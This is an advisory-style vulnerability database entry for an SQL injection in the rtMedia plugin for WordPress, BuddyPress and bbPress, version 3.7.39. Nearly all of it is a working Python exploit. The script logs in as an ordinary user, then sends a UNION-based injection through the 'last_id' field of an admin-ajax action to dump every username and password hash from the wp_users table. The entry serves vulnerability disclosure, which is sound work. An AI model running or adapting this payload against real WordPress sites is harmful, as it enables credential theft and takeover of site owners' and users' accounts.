rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection

2015-04-28T00:00:00
ID WPVDB-ID:7950
Type wpvulndb
Reporter James Hooker
Modified 2019-10-21T00:00:00

Description

WordPress Vulnerability - rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection import requests,json s = requests.session() target = 'http://localhost' url = '%s/wp-login.php'%target payload = { "log":"test", "pwd":"test", "wp-submit":"Log+In" } r = s.post(url, data=payload) url = '%s/wp-admin/admin-ajax.php'%target payload = { "action":"rtmedia_activity_upgrade", "last_id":"0 AND 1=0 GROUP BY id UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(concat_ws(char(58),wp_users.user_login,wp_users.user_pass)) from wp_users group by 1=1),13,14,15,16,17,18,19,20,21,22,23,24 FROM wp_rt_rtm_media GROUP BY id--" } r = s.post(url, data=payload) print json.loads(r.text)['activity_id']